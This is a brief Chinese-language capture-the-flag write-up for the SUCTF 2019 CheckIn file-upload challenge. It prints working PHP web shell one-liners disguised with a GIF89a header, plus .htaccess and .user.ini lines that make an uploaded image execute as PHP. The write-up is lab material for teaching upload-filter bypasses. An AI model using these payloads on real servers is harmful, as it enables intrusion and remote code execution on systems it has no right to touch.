[SUCTF 2019]CheckIn1
启动靶机,直接尝试传木马
启用burp抓包,尝试改后缀jpg和content-type
提示我们上传的文件中含有非法字符<?
尝试一句话木马变形
<script language="php">@eval_r($_GET[b])</script>
看来还对文件头进行了检测 ,上传图片马
GIF89a?
<script language="pHp">eval($_REQUEST[1])</script>
上传成功
此时访问上传jpg文件是无法解析我们的php代码的,需要再上传个.htaccess文件(前面也要加上文件头)
GIF89a?
AddType application/x-httpd-php .jpg
点击上传
上传成功,访问一下.htaccess,神奇的是直接下载了一个index.htaccess文件,感觉是没戏了,抱着试一试的态度访问了一下图片马,果然,还是jpg无法解析。
既然不能通过.htaccess的方法解析图片马,那就搜一下大佬的wp,发现他们都用了.user.ini方法
GIF89a?
auto_prepend_file=tupianma.jpg
上传成功,但图片马好像没了,还需要再传一次,上传成功,先访问一下index.php,蚁剑连接
拿到flag flag{0e59e145-2ce6-4d5f-939e-2aee06bbca57}